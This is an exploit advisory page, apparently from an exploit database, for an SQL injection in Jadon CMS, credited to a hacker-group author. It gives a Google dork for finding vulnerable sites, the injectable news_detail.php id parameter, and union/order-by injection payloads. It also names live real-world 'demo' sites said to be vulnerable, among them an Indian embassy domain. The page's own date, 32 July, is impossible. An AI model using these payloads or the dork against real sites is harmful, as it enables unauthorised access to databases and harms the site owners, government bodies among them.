INDIAN EMBASSY Jadon CMS SQL INJECTION Vulnerability

2016.07.31
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

########################### # INDIAN EMBASSY Jadon CMS SQL INJECTION Vulnerability ########################### ========================================================= [+] Title :- INDIAN EMBASSY Jadon CMS - SQL INJECTION [+] Date :- 32 - july - 2016 [+] Vendor Homepage :- http://jadontech.com/ [+] Version :- All Versions [+] Tested on :- Linux - Windows - Mac [+] Category :- webapps [+] Google Dorks :- "Designed by Jadon Technologies" or inurl:/news_detail.php?in_id= site:.in [+] Exploit Author :- Natasya A.K.A codestack [+] Team name :- codegirl , girls-silent , anongirls [+] Official Website :- www.codegirlmovie.com [+] Available :- sql injection cheat sheet | sql injection Havij [+] Greedz to :- Indonesian People | Keep-silent | Hmei7 [+] Contact :- admin@kpu.go.id ========================================================= [+] Severity Level :- High [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id, newsid= [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error [+] SQL vulnerable File :- /home/DOMAIN/public_html/XXX.php [+] POC :- http://127.0.0.1/news_detail.php?id=[SQL]' The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction. http://www.[WEBSITE].com/news_detail.php?id=63' order by [SQL INJECTION]--+ http://www.[WEBSITE].com/news_detail.php?id=63' union all select [SQL INJECTION]--+ [+] DEMO :- http://www.jecrcudml.edu.in/news_detail.php?id=17' http://www.embindia.org/news_detail.php?id=21 http://eoilisbon.in/news_detail.php?id=6 ======================================================= ########################### # Discovered Analyze by : Ternate-Labs Pentesting ###########################

References:

https://cxsecurity.com/issue/WLB-2016050106
http://iedb.ir/exploits-4007.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top